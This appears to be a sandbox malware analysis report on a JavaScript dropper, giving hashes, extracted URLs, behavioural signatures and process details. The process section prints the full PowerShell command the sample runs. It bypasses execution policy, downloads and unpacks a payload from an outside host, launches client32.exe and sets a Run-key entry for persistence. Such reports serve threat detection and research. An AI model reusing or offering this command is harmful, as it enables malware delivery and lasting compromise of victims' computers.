Analysis
- max time kernel: 119s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20230712-en
- resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
- submitted: 29/08/2023, 08:27
Static task: static1

Behavioral task: behavioral1
- Sample: 232123212321.js
- Resource: win7-20230712-en
- 4 signatures
- 150 seconds

Behavioral task: behavioral2
- Sample: 232123212321.js
- Resource: win10v2004-20230703-en
- 10 signatures
- 150 seconds
General
- Target: 232123212321.js
- Size: 3KB
- MD5: 55b69c07b1ba60eb1dd5f602a503c8a8
- SHA1: f52c545c39628c813234d509a6a52decdf320464
- SHA256: 08e4dadf294dad1072e37c8979e394055ce176c940e36f47895c2929efb24125
- SHA512: 2f30c9cac5d4e0de019fd03e4cee935baf5d1d048923215d5a53e96028a675c4ddcf0f3e3e9ad8942d0c2118fc5659f23b9b20295e00185af73c1fe6ef576673
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source URLs:
  - ps1.dropper: http://instalfrio.cl/destination.txt
  - exe.dropper: http://instalfrio.cl/destination.txt
Signatures
- Blocklisted process makes network request (1 IoC)
  flow 5, pid 2124, process powershell.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 2124, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 2124, process powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  PID 1516 (wscript.exe) wrote to memory of 2124, procid_target 28; the same entry is recorded three times
Processes
1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\232123212321.js
   PID: 1516
   - Suspicious use of WriteProcessMemory
2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
   PID: 2124
   - Blocklisted process makes network request
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken